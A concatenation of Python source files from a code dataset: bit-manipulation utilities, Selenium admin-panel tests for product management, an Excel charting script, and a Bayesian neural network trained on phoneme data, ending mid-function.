16 (00010000).\r\n \tIf we minus 1 from this, all the bits from LSB to set bit get toggled,\r\n ., 16 - 1 = 15 (00001111).Now if we AND x with(x - 1) and the result is 0\r\n\t then we can say that x is power of 2 otherwise not.\r\n\t We have to take extra care when x = 0.\r\n '''\r\n return x and operator.not_( operator.and_( x, x-1 ) ) \r\n\r\ndef log2(x):\r\n ''' log2 by right shift''' \r\n res = 0\r\n while x:\r\n x = operator.rshift(x, 1)\r\n res += 1\r\n return res-1\r\n\r\ndef myswap(a, b):\r\n ''' swap using XOR logic without extra variable ''' \r\n a ^= b\r\n b ^= a\r\n a ^= b\r\n return a, b\r\n\r\ndef power2( n ):\r\n ''' power of 2 by left shift''' \r\n return operator.lshift(1, n)\r\n\r\ndef rightmostOne(n):\r\n ''' Return the rightmost 1 in the binary representation of a number. \r\n The property is, the difference between a binary number n and n-1 is \r\n all the bits on the right of the rightmost 1 are flipped including the rightmost 1. \r\n '''\r\n return n ^ operator.and_(n, n-1)\r\n \r\n \r\ndef binaryArray(n):\r\n ''' return an array of the binary representation of a number'''\r\n binary = []\r\n while n:\r\n binary.append( n % 2 )\r\n n = math.floor( n / 2 )\r\n return binary[::-1] \r\n \r\ndef countBits(n):\r\n ''' Given an integer n, return an array ans of length n + 1 such that for each i (0 <= i <= n), \r\n ans[i] is the number of 1's in the binary representation of i\r\n '''\r\n res = []\r\n for i in range(n+1):\r\n res.append(sum(binaryArray(i)))\r\n return res\r\n\r\ndef countBits2(n):\r\n ''' Can you do it in linear time O(n) and possibly in a single pass? \r\n All whole numbers can be represented by 2N (even) and 2N+1 (odd).\r\n For a given binary number, multiplying by 2 is the same as adding a zero at the end \r\n (just as we just add a zero when multiplying by ten in base 10).\r\n Since multiplying by 2 just adds a zero, then any number and its double will have the same number of 1's. \r\n Likewise, doubling a number and adding one will increase the count by exactly 1. Or: \r\n countBits(N) = countBits(2N)\r\n countBits(N)+1 = countBits(2N+1)\r\n Thus we can see that any number will have the same bit count as half that number, \r\n with an extra one if it's an odd number. We iterate through the range of numbers \r\n and calculate each bit count successively in this manner: \r\n ''' \r\n dp = [0] * (n+1)\r\n for i in range(1, n+1):\r\n dp[i] = dp[i//2] + i%2\r\n return dp\r\n\r\ndef divide(dividend, divisor):\r\n \"\"\"\r\n\t29. Divide Two Integers\r\n\tMedium\r\n\tGiven two integers dividend and divisor, divide two integers without using multiplication, division, and mod operator.\r\n\tThe integer division should truncate toward zero, which means losing its fractional part. For example, 8.345 would be truncated to 8, \r\n\tand -2.7335 would be truncated to -2.\r\n\tReturn the quotient after dividing dividend by divisor.\r\n\tNote: Assume we are dealing with an environment that could only store integers within the 32-bit signed integer range: [−231, 231 − 1]. \r\n\tFor this problem, if the quotient is strictly greater than 231 - 1, then return 231 - 1, and if the quotient is strictly less than -231, then return -231. \r\n\r\n\tHow can we improve this 🤔? What if instead of decreasing the dividend linearly, we decrease it exponentially? 
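# NOTE: worked examples for countBits2() above and the divide() being
# defined here. The recurrence dp[i] = dp[i // 2] + i % 2 holds because
# halving shifts out the lowest bit and the parity term adds it back:
#
#     countBits2(5)  ->  [0, 1, 1, 2, 1, 2]
#     # popcounts of 0b0, 0b1, 0b10, 0b11, 0b100, 0b101
#
# Tracing divide(22, 3): 3 << 2 = 12 <= 22 while 3 << 3 = 24 > 22, so the
# quotient gains 1 << 2 = 4 and the dividend drops to 10; the remainder 10
# then contributes 2 and the remainder 4 contributes 1, giving 22 // 3 == 7.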
\r\n\tThis will definitely improve the performance drastically.\r\n\r\n\tWe can follow the below steps —\r\n\r\n\tA variable quotient will keep the track of answer.\r\n\tA while loop will check the condition dividend >= divisor\r\n\tInside this while loop, we will have one variable shift which will left shift the divisor by one bit and check if the result is less than the dividend. This will repeat until the condition is false.\r\n\tOnce, we are out of inner loop, then we will add the number of times we shifted to the quotient.\r\n\tAlso, we will now subtract the result of shifting to divisor from the dividend for the next iteration. Remember that since in the while loop the value of shifting had gone beyond the dividend, the value we need to subtract is one bit less shifted.\r\n\tWe will repeat the process unless we reach to the point where divisor is greater than dividend.\r\n\tYou must be wondering that why are we shifting the bits? The answer is, one left shift bit means the number is doubled. And since we cannot use multiplication, we are using left shifting.\r\n\r\n\tx << y\r\n\tReturns x with the bits shifted to the left by y places (and new bits on the right-hand-side are zeros). This is the same as multiplying x by 2**y.\r\n\tx >> y\r\n\tReturns x with the bits shifted to the right by y places. This is the same as //'ing x by 2**y.\r\n\t\r\n\t:type dividend: int\r\n\t:type divisor: int\r\n\t:rtype: int\r\n \"\"\"\r\n # MAX and MIN values for integer\r\n MAX = 2147483647\r\n MIN = -2147483648\r\n # Check for overflow\r\n if divisor == 0 or (dividend == MIN and divisor == -1):\r\n return MAX\r\n # Sign of result`\r\n sign = -1 if (dividend > 0 and divisor < 0) or (dividend < 0 and divisor > 0) else 1\r\n # Quotient\r\n quotient = 0\r\n # Take the absolute value\r\n absoluteDividend = abs(dividend)\r\n absoluteDivisor = abs(divisor)\r\n # Loop until the dividend is greater than divisor\r\n while absoluteDividend >= absoluteDivisor:\r\n # This represents the number of bits shifted or\r\n # how many times we can double the number\r\n shift = 0\r\n while absoluteDividend >= (absoluteDivisor << shift):\r\n shift += 1\r\n # Add the number of times we shifted to the quotient\r\n quotient += (1 << (shift - 1))\r\n # Update the dividend for the next iteration\r\n absoluteDividend -= absoluteDivisor << (shift - 1)\r\n return -quotient if sign == -1 else quotient\r\n \r\n","sub_path":"Algorithms/bitmanipulation.py","file_name":"bitmanipulation.py","file_ext":"py","file_size_in_byte":6703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"574644590","text":"from page_objects.admin_login import AdminLogin\nfrom page_objects.admin_page import AdminPage\nfrom page_objects.utils import Utils\n\nimport yaml\n\nconf = yaml.safe_load(open('configuration.yml'))\n\nemail = conf['admin']['email']\npassword = conf['admin']['password']\n\nproduct_name = conf['new']['product_name']\nmeta_tag_title = conf['new']['meta_tag_title']\nmodel = conf['new']['model']\nprice = conf['new']['price']\nmin_quantity = conf['new']['min_quantity']\n\n\ndef admin_authorization(browser):\n \"\"\"\n Авторизация под учетной записью администратора\n :param browser:\n \"\"\"\n\n browser.log.info('Starting admin_authorization')\n\n admin_login = AdminLogin(browser.wd)\n admin_page = AdminPage(browser.wd)\n\n # Открывам страницу администратора:\n browser.open_admin_page()\n\n # Очищаем поля и username вводим данные для авторизации:\n admin_login.fill_username(email)\n\n # 
Очищаем поля и password вводим данные для авторизации:\n admin_login.fill_password(password)\n\n # Нажимаем кнопку Login для входа в аккаунт:\n admin_login.login_button()\n\n browser.log.info('Logging out')\n try:\n admin_page.logout()\n except Exception as e:\n browser.log.error(f'Exception - {e}')\n\n\ndef open_products_from_catalog(browser):\n \"\"\"\n Navigation -> Catalog -> Products\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # В разделе Navigation выбираем Catalog:\n admin_page.click_catalog()\n\n # В разделе Catalog выбираем Products:\n admin_page.click_products()\n\n\ndef add_product(browser):\n \"\"\"\n Добавление продукта\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # Ищем поле \"Product name\", очищаем и вводим данные:\n admin_page.fill_product_name(product_name)\n\n # Ищем поле \"Meta tag title\", очищаем и вводим данные:\n admin_page.fill_meta_tag_title(meta_tag_title)\n\n # В навигационное панеле ищем \"Data\" и нажимаем:\n admin_page.click_navigation_data()\n\n # Ищем поле \"Model\", очищаем и вводим данные:\n admin_page.fill_model(model)\n\n # Ищем поле \"Price\", очищаем и вводим данные:\n admin_page.fill_price(price)\n\n # Ищем поле \"Minimum Quantity\", очищаем и вводим данные:\n admin_page.fill_min_quantity(min_quantity)\n\n\ndef test_add_new_product(browser):\n \"\"\"\n Добавление нового продукта в Product List\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # Авторизация под учетной записью администратора:\n admin_authorization(browser)\n\n # Navigation -> Catalog -> Products:\n open_products_from_catalog(browser)\n\n # Ищем кнопку \"Add new\" и нажимаем на нее:\n admin_page.add_new_button()\n\n # Добавляем продукт:\n add_product(browser)\n\n # Ищем кнопку \"Save\" и нажимаем на нее:\n admin_page.save_button()\n\n # Проверяем успешность добавления нового продукта в Product List:\n alert_success = admin_page.alert_success()\n\n # Проверяем успешность добавления нового продукта в Product List:\n assert 'Success: You have modified products!' in alert_success\n\n\ndef test_edit_product(browser):\n \"\"\"\n Изменение продукта в Product List\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # Авторизация под учетной записью администратора:\n admin_authorization(browser)\n\n # Navigation -> Catalog -> Products:\n open_products_from_catalog(browser)\n\n # Выбираем продукт для измения и нажимаем на него:\n admin_page.product_for_edit()\n\n # Ищем кнопку \"Edit\" и нажимаем на нее:\n admin_page.edit_button()\n\n # Вводим данные нового продукта:\n add_product(browser)\n\n # Ищем кнопку \"Save\" и нажимаем на нее:\n admin_page.save_button()\n\n # Проверяем успешность изменения продукта в Product List:\n alert_success = admin_page.alert_success()\n assert 'Success: You have modified products!' 
in alert_success\n\n\ndef test_delete_product(browser):\n \"\"\"\n Удаление продукта из Product List\n :param browser:\n :return:\n \"\"\"\n admin_page = AdminPage(browser.wd)\n utils = Utils(browser.wd)\n\n # Авторизация под учетной записью администратора:\n admin_authorization(browser)\n\n # Navigation -> Catalog -> Products:\n open_products_from_catalog(browser)\n\n # Выбираем продукт для удаления:\n admin_page.product_for_delete()\n\n # Ищем кнопку \"Delete\" и нажимаем на нее:\n admin_page.delete_button()\n\n # Подтверждаем действие удаления на странице браузера:\n utils.accept_alert()\n\n # Проверяем успешность удаления продукта из Product List:\n alert_success = admin_page.alert_success()\n assert 'Success: You have modified products!' in alert_success\n","sub_path":"05_11_Selenium/tests/12_Work_with_elements_test.py","file_name":"12_Work_with_elements_test.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"141490244","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 11 18:06:38 2020\r\n\r\n@author: LENOVO\r\n\"\"\"\r\n\r\n\r\n# Deber grafica Excell\r\n\r\nimport pandas as pd\r\nimport xlsxwriter\r\n\r\npath_guardado = \"./data/artwork_data.pickle\"\r\n\r\ndf = pd.read_pickle(path_guardado)\r\n\r\nsub_df = df.iloc[49980:50519,:].copy()\r\nnum_artistas = sub_df[\"artist\"].value_counts()\r\n\r\n\r\nworkbook = xlsxwriter.Workbook('grafica_excel.xlsx')\r\nworksheet = workbook.add_worksheet()\r\n\r\nworksheet.write_column('A1', num_artistas.index)\r\nworksheet.write_column('B1', num_artistas)\r\n\r\nchart = workbook.add_chart({'type': 'line'})\r\n\r\n\r\nchart.add_series({\r\n 'name': 'Artistas',\r\n 'categories': '=Sheet1!$A$1:$A$85',\r\n 'values': '=Sheet1!$B$1:$B$85',\r\n 'marker': {'type' : 'circle'}\r\n \r\n})\r\n\r\nworksheet.insert_chart('D2', chart)\r\n\r\n\r\n\r\nworkbook.close()\r\n","sub_path":"03-Pandas/grafico_excel.py","file_name":"grafico_excel.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153038296","text":"#matplotlib inline\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom tensorboardX import SummaryWriter\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import make_grid\nfrom tqdm import tqdm, trange\nimport pandas as pd\n\nprefix = \"_lf_phoneme_\"\n# define the summary writer\nwriter = SummaryWriter()\nsns.set()\nsns.set_style(\"dark\")\nsns.set_palette(\"muted\")\nsns.set_color_codes(\"muted\")\n\n# select the device\nDEVICE = torch.device(\"cuda:2\" if torch.cuda.is_available() else \"cpu\")\nLOADER_KWARGS = {'num_workers': 1, 'pin_memory': True} if torch.cuda.is_available() else {}\ncuda = torch.cuda.set_device(2)\n\nif (torch.cuda.is_available()):\n print(\"GPUs are used!\")\nelse:\n print(\"CPUs are used!\")\n\n# define the parameters\nBATCH_SIZE = 100\nTEST_BATCH_SIZE = 100\nCOND_OPT = False\nCLASSES = 5\n# TRAIN_EPOCHS = 250\nSAMPLES = 1\nTEST_SAMPLES = 10\nTEMPER = 0.001\nTEMPER_PRIOR = 0.001\nepochs = 250\npepochs = 50\n\n#prepare the data\ndata = pd.read_csv('http://www.uio.no/studier/emner/matnat/math/STK2100/data/phoneme.data')\ndata = data.drop(columns=[\"row.names\"])\ndata = 
pd.concat([data,data.g.astype(\"category\").cat.codes.astype(int)],sort=False, axis=1) #get_dummies(data['g'], prefix='phoneme')],sort=False, axis=1)\ndata = data.drop(columns=[\"g\",\"speaker\"])\ndata = data.values\n\nnp.random.seed(40590)\n\ntr_ids = np.random.choice(4509, 3500, replace = False)\nte_ids = np.setdiff1d(np.arange(4509),tr_ids)[0:1000]\n\ndtrain = data[tr_ids,:]\n\ndata_mean = dtrain.mean(axis=0)[0:256]\ndata_std = dtrain.std(axis=0)[0:256]\n\ndata[:,0:256] = (data[:,0:256] - data_mean)/data_std\n\n\n\ndtrain = data[tr_ids,:]\ndtest = data[te_ids,:]\n\n\nTRAIN_SIZE = len(tr_ids)\nTEST_SIZE = len(te_ids)\nNUM_BATCHES = TRAIN_SIZE/BATCH_SIZE\nNUM_TEST_BATCHES = len(te_ids)/BATCH_SIZE\n\n\n\n#assert (TRAIN_SIZE % BATCH_SIZE) == 0\n#assert (TEST_SIZE % TEST_BATCH_SIZE) == 0\n\n\ndef probit(x):\n return torch.distributions.Normal(0, 1).cdf(x)\n\n\n# define Gaussian distribution\nclass Gaussian(object):\n def __init__(self, mu, rho):\n super().__init__()\n self.mu = mu\n self.rho = rho\n self.normal = torch.distributions.Normal(0, 1)\n\n @property\n def sigma(self):\n return torch.log1p(torch.exp(self.rho))\n #return torch.exp(self.rho)\n\n def rsample(self):\n epsilon = self.normal.sample(self.rho.size()).to(DEVICE)\n return self.mu + self.sigma * epsilon\n\n def log_prob(self, input):\n return (-math.log(math.sqrt(2 * math.pi))\n - torch.log(self.sigma)\n - ((input - self.mu) ** 2) / (2 * self.sigma ** 2)).sum()\n\n def log_prob_iid(self, input):\n return (-math.log(math.sqrt(2 * math.pi))\n - torch.log(self.sigma)\n - ((input - self.mu) ** 2) / (2 * self.sigma ** 2))\n\n def full_log_prob(self, input, gamma):\n return (torch.log(gamma * (torch.exp(self.log_prob_iid(input)))\n + (1 - gamma) + 1e-8)).sum()\n\n\n\n#define low rank multivariate Gaussian distribution\nclass LowRankMultivariateNormal(torch.distributions.LowRankMultivariateNormal):\n pass\n # rsample, log_prob, etc. 
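# NOTE: in the Gaussian class above, sigma = log1p(exp(rho)) is the softplus
# transform, which keeps the standard deviation positive while rho ranges
# over all reals, and rsample() is the reparameterization trick
# (mu + sigma * eps with eps ~ N(0, 1)), which lets gradients flow through
# mu and rho. A small numeric check:
#
#     rho = torch.tensor(-4.0)
#     sigma = torch.log1p(torch.exp(rho))   # ~= 0.0182, always positive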
available by inheritance\n\n\n# define Bernoulli distribution\nclass Bernoulli(object):\n def __init__(self, alpha):\n super().__init__()\n self.alpha = alpha\n self.exact = False\n\n def rsample(self):\n if self.exact:\n gamma = torch.distributions.Bernoulli(self.alpha).sample().to(DEVICE)\n else:\n gamma = torch.distributions.RelaxedBernoulli(probs=self.alpha, temperature=TEMPER_PRIOR).rsample()\n return gamma\n\n def sample(self):\n return torch.distributions.Bernoulli(self.alpha).sample().to(DEVICE)\n\n def log_prob(self, input):\n if self.exact:\n gamma = torch.round(input.detach())\n output = (gamma * torch.log(self.alpha + 1e-8) + (1 - gamma) * torch.log(1 - self.alpha + 1e-8)).sum()\n else:\n output = (input * torch.log(self.alpha + 1e-8) + (1 - input) * torch.log(1 - self.alpha + 1e-8)).sum()\n return output\n\n\n# define Normal-Gamma distribution\nclass GaussGamma(object):\n def __init__(self, a, b):\n super().__init__()\n self.a = a\n self.b = b\n self.exact = False\n self.sigma = torch.distributions.Gamma(self.a, self.b)\n\n def log_prob(self, input, gamma):\n tau = self.sigma.rsample()\n if self.exact:\n gamma1 = torch.round(gamma.detach())\n output = (gamma1 * (self.a * torch.log(self.b) + (self.a - 0.5) * tau - self.b * tau - torch.lgamma(\n self.a) - 0.5 * torch.log(torch.tensor(2 * np.pi))) - tau * torch.pow(input, 2) + (\n 1 - gamma1) + 1e-8).sum()\n else:\n output = (gamma * (self.a * torch.log(self.b) + (self.a - 0.5) * tau - self.b * tau - torch.lgamma(\n self.a) - 0.5 * torch.log(torch.tensor(2 * np.pi))) - tau * torch.pow(input, 2) + (\n 1 - gamma) + 1e-8).sum()\n return output\n\n\n# define BetaBinomial distibution\nclass BetaBinomial(object):\n def __init__(self, pa, pb):\n super().__init__()\n self.pa = pa\n self.pb = pb\n self.exact = False\n\n def log_prob(self, input, pa, pb):\n if self.exact:\n gamma = torch.round(input.detach())\n else:\n gamma = input\n return (torch.lgamma(torch.ones_like(input)) + torch.lgamma(gamma + torch.ones_like(input) * self.pa)\n + torch.lgamma(torch.ones_like(input) * (1 + self.pb) - gamma) + torch.lgamma(\n torch.ones_like(input) * (self.pa + self.pb))\n - torch.lgamma(torch.ones_like(input) * self.pa + gamma)\n - torch.lgamma(torch.ones_like(input) * 2 - gamma) - torch.lgamma(\n torch.ones_like(input) * (1 + self.pa + self.pb))\n - torch.lgamma(torch.ones_like(input) * self.pa) - torch.lgamma(torch.ones_like(input) * self.pb)).sum()\n\n def rsample(self):\n gamma = torch.distributions.RelaxedBernoulli(\n probs=torch.distributions.Beta(self.pa, self.pb).rsample().to(DEVICE), temperature=0.001).rsample().to(\n DEVICE)\n return gamma\n\n\n# define the linear layer for the BNN\nclass BayesianLinear(nn.Module):\n def __init__(self, in_features, out_features, layer_id):\n super().__init__()\n\n # configuration of the layer\n self.layer = layer_id\n self.in_features = in_features\n self.out_features = out_features\n\n # weight parameters\n self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-0.2, 0.2))\n self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-5, -4))\n self.weight = Gaussian(self.weight_mu, self.weight_rho)\n # weight priors\n self.weight_a = nn.Parameter(torch.Tensor(1).uniform_(1, 1.1))\n self.weight_b = nn.Parameter(torch.Tensor(1).uniform_(1, 1.1))\n self.weight_prior = GaussGamma(self.weight_a, self.weight_b)\n\n # model parameters\n self.model_mu = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-0.0001, 0.0001).to(DEVICE))\n self.model_sigma = 
nn.Parameter(torch.Tensor(out_features, in_features).uniform_(10, 20).to(DEVICE))\n self.model_fact = nn.Parameter(\n torch.Tensor(out_features, in_features).uniform_(-10, 10).unsqueeze(-1).to(DEVICE))\n self.alpha = torch.Tensor(out_features, in_features).uniform_(0.999, 0.9999)\n self.lambdal = torch.Tensor(torch.Tensor(out_features, in_features).uniform_(0, 1))\n self.gamma = Bernoulli(self.alpha)\n self.gammas = torch.Tensor(out_features, in_features).uniform_(0.99, 1)\n self.lambdaD = LowRankMultivariateNormal(loc=self.model_mu, cov_factor=self.model_fact,\n cov_diag=self.model_sigma)\n # model priors\n self.pa = nn.Parameter(torch.Tensor(1).uniform_(1, 3.1))\n self.pb = nn.Parameter(torch.Tensor(1).uniform_(1, 3.1))\n self.gamma_prior = BetaBinomial(pa=self.pa, pb=self.pb)\n\n # bias (intercept) parameters\n self.bias_mu = nn.Parameter(torch.Tensor(out_features).uniform_(-0.2, 0.2))\n self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(-5, -4))\n self.bias = Gaussian(self.bias_mu, self.bias_rho)\n # bias (intercept) priors\n self.bias_a = nn.Parameter(torch.Tensor(out_features).uniform_(1, 1.1))\n self.bias_b = nn.Parameter(torch.Tensor(out_features).uniform_(1, 1.1))\n self.bias_prior = GaussGamma(self.bias_a, self.bias_b)\n\n # scalars\n self.log_prior = 0\n self.log_variational_posterior = 0\n self.lagrangian = 0\n\n # forward path\n def forward(self, input, cgamma, sample=False, medimean=False, calculate_log_probs=False):\n # if sampling\n if self.training or sample:\n self.gammas = cgamma\n weight = cgamma * (self.weight.rsample())\n bias = self.bias.rsample()\n # if mean of the given model (e.g.) median probability model\n elif medimean:\n weight = cgamma * self.weight.mu\n bias = self.bias.mu\n # if joint mean in the space of models and parameters (for a given alpha vector)\n else:\n weight = self.alpha * self.weight.mu\n bias = self.bias.mu\n # calculate the losses\n if self.training or calculate_log_probs:\n\n self.log_prior = self.weight_prior.log_prob(weight, cgamma) + self.bias_prior.log_prob(bias,\n torch.ones_like(\n bias)) + self.gamma_prior.log_prob(\n cgamma, pa=self.pa, pb=self.pb)\n self.log_variational_posterior = self.weight.full_log_prob(input=weight,\n gamma=cgamma) + self.gamma.log_prob(\n cgamma) + self.bias.log_prob(bias)\n else:\n self.log_prior, self.log_variational_posterior\n # propogate\n return F.linear(input, weight, bias)\n\n # deine the whole BNN\n\n\nclass BayesianNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n # set the architecture\n self.l1 = BayesianLinear(256, 400, 1)\n self.l2 = BayesianLinear(400, 600, 1)\n self.l3 = BayesianLinear(600, 5, 1)\n\n def forward(self, x, g1, g2, g3, sample=False, medimean=False):\n x = x.view(-1, 256)\n x = F.relu(self.l1.forward(x, g1, sample, medimean))\n x = F.relu(self.l2.forward(x, g2, sample, medimean))\n x = F.log_softmax(F.relu(self.l3.forward(x, g3, sample, medimean)), dim=1)\n return x\n\n def log_prior(self):\n return self.l1.log_prior \\\n + self.l2.log_prior \\\n + self.l3.log_prior\n\n def log_variational_posterior(self):\n return self.l1.log_variational_posterior \\\n + self.l2.log_variational_posterior \\\n + self.l3.log_variational_posterior\n\n # sample the marginal likelihood lower bound\n def sample_elbo(self, input, target, samples=SAMPLES):\n outputs = torch.zeros(samples, BATCH_SIZE, CLASSES).to(DEVICE)\n log_priors = torch.zeros(samples).to(DEVICE)\n log_variational_posteriors = torch.zeros(samples).to(DEVICE)\n negative_log_likelihoods = 
torch.zeros(samples).to(DEVICE)\n for i in range(samples):\n # get the inclusion probabilities for all layers\n self.l1.lambdal = self.l1.lambdaD.rsample().to(DEVICE)\n self.l2.lambdal = self.l2.lambdaD.rsample().to(DEVICE)\n self.l3.lambdal = self.l3.lambdaD.rsample().to(DEVICE)\n self.l1.alpha = probit(self.l1.lambdal) # 1/(1+torch.exp(-self.l1.lambdal))\n self.l1.gamma.alpha = self.l1.alpha\n self.l2.alpha = probit(self.l2.lambdal) # 1/(1+torch.exp(-self.l2.lambdal))\n self.l2.gamma.alpha = self.l2.alpha\n self.l3.alpha = probit(self.l3.lambdal) # 1/(1+torch.exp(-self.l3.lambdal))\n self.l3.gamma.alpha = self.l3.alpha\n\n # sample the model\n cgamma1 = self.l1.gamma.rsample().to(DEVICE)\n cgamma2 = self.l2.gamma.rsample().to(DEVICE)\n cgamma3 = self.l3.gamma.rsample().to(DEVICE)\n\n # get the results\n outputs[i] = self.forward(input, g1=cgamma1, g2=cgamma2, g3=cgamma3, sample=True, medimean=False)\n log_priors[i] = self.log_prior()\n log_variational_posteriors[i] = self.log_variational_posterior()\n negative_log_likelihoods[i] = F.nll_loss(outputs[i], target, reduction='sum')\n\n # the current log prior\n log_prior = log_priors.mean()\n # the current log variational posterior\n log_variational_posterior = log_variational_posteriors.mean()\n # the current negative log likelihood\n negative_log_likelihood = negative_log_likelihoods.mean()\n\n # the current ELBO\n loss = negative_log_likelihood + (log_variational_posterior - log_prior) / NUM_BATCHES\n return loss, log_prior, log_variational_posterior, negative_log_likelihood\n\n\n# save the relevant parameters histograms\ndef write_weight_histograms(epoch, i):\n writer.add_histogram('histogram/mfw1_mu'+prefix, net.l1.weight_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfw1_rho', net.l1.weight_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfw2_mu'+prefix, net.l2.weight_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfw2_rho', net.l2.weight_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfw3_mu'+prefix, net.l3.weight_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfw3_rho', net.l3.weight_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfb1_mu'+prefix, net.l1.bias_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfb1_rho', net.l1.bias_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfb2_mu'+prefix, net.l2.bias_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfb2_rho', net.l2.bias_rho,epoch+i*epochs)\n writer.add_histogram('histogram/mfb3_mu'+prefix, net.l3.bias_mu, epoch + i * epochs)\n # writer.add_histogram('histogram/mfb3_rho', net.l3.bias_rho,epoch+i*epochs)\n\n\n# save the relevant losses\ndef write_loss_scalars(epoch, i, batch_idx, loss, log_prior, log_variational_posterior, negative_log_likelihood):\n writer.add_scalar('logs/mloss'+prefix, loss, epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mcomplexity_cost'+prefix, log_variational_posterior - log_prior,\n i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mlog_prior'+prefix, log_prior, i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mlog_variational_posterior'+prefix, log_variational_posterior,\n i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n writer.add_scalar('logs/mnegative_log_likelihood'+prefix, negative_log_likelihood,\n i * epochs * NUM_BATCHES + epoch * NUM_BATCHES + batch_idx)\n\n\n# Stochastic Variational Inference iteration\ndef train(net, optimizer, epoch, i, batch_size = 
BATCH_SIZE):\n net.train()\n old_batch = 0\n for batch in range(int(np.ceil(dtrain.shape[0] / batch_size))):\n batch = (batch + 1)\n _x = dtrain[old_batch: batch_size * batch,0:256]\n _y = dtrain[old_batch: batch_size * batch, 256:257]\n old_batch = batch_size * batch\n #print(_x.shape)\n #print(_y.shape)\n\n data = Variable(torch.FloatTensor(_x)).cuda()\n target = Variable(torch.transpose(torch.LongTensor(_y),0,1).cuda())[0]\n\n\n net.zero_grad()\n loss, log_prior, log_variational_posterior, negative_log_likelihood = net.sample_elbo(data, target)\n loss.backward(retain_graph=True)\n\n if COND_OPT:\n net.l1.weight_mu.grad = net.l1.weight_mu.grad * net.l1.gammas.data\n net.l2.weight_mu.grad = net.l2.weight_mu.grad * net.l2.gammas.data\n net.l3.weight_mu.grad = net.l3.weight_mu.grad * net.l3.gammas.data\n optimizer.step()\n write_loss_scalars(epoch, i, batch, loss, log_prior, log_variational_posterior, negative_log_likelihood)\n\n\n# Test on the unseen data\ndef test_ensemble(net, batch_size = BATCH_SIZE):\n net.eval()\n correct1 = 0\n correct2 = 0\n correct3 = 0\n correct4 = 0\n cases3 = 0\n cases4 = 0\n ctr = 0\n corrects = np.zeros(TEST_SAMPLES + 12, dtype=int)\n spars = np.zeros(TEST_SAMPLES)\n gt1 = np.zeros((400, 256))\n gt2 = np.zeros((600, 400))\n gt3 = np.zeros((5, 600))\n\n old_batch = 0\n for batch in range(int(np.ceil(dtest.shape[0] / batch_size))):\n batch = (batch + 1)\n _x = dtest[old_batch: batch_size * batch, 0:256]\n _y = dtest[old_batch: batch_size * batch, 256:257]\n\n old_batch = batch_size * batch\n\n #print(_x.shape)\n #print(_y.shape)\n\n data = Variable(torch.FloatTensor(_x)).cuda()\n target = Variable(torch.transpose(torch.LongTensor(_y), 0, 1).cuda())[0]\n\n outputs = torch.zeros(TEST_SAMPLES + 12, TEST_BATCH_SIZE, CLASSES).to(DEVICE)\n for i in range(TEST_SAMPLES):\n\n # get the inclusion probabilities for all layers\n net.l1.lambdal = net.l1.lambdaD.rsample().to(DEVICE)\n net.l2.lambdal = net.l2.lambdaD.rsample().to(DEVICE)\n net.l3.lambdal = net.l3.lambdaD.rsample().to(DEVICE)\n net.l1.alpha = probit(net.l1.lambdal) # 1/(1+torch.exp(-net.l1.lambdal))\n net.l1.gamma.alpha = net.l1.alpha\n net.l2.alpha = probit(net.l2.lambdal) # 1/(1+torch.exp(-net.l2.lambdal))\n net.l2.gamma.alpha = net.l2.alpha\n net.l3.alpha = probit(net.l3.lambdal) # 1/(1+torch.exp(-net.l3.lambdal))\n net.l3.gamma.alpha = net.l3.alpha\n\n # sample the model\n g1 = net.l1.gamma.rsample().to(DEVICE)\n g2 = net.l2.gamma.rsample().to(DEVICE)\n g3 = net.l3.gamma.rsample().to(DEVICE)\n\n ctr += 1\n spars[i] = spars[i] + ((torch.sum(g1 > 0.5).cpu().detach().numpy() + torch.sum(\n g2 > 0.5).cpu().detach().numpy() + torch.sum(g3 > 0.5).cpu().detach().numpy()) / (\n 5 * 600 + 400 * 600 + 400 * 256))\n gt1 = gt1 + (g1 > 0.5).cpu().numpy()\n gt2 = gt2 + (g2 > 0.5).cpu().numpy()\n gt3 = gt3 + (g3 > 0.5).cpu().numpy()\n outputs[i] = net.forward(data, sample=True, medimean=False, g1=net.l1.gamma.rsample(),\n g2=net.l2.gamma.rsample(), g3=net.l3.gamma.rsample())\n\n\n outputs[i + 10] = net.forward(data, sample=True, medimean=False,\n g1=(net.l1.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g2=(net.l2.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g3=(net.l3.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE))\n if (i == 0):\n mydata_means = sigmoid(outputs[i].detach().cpu().numpy())\n 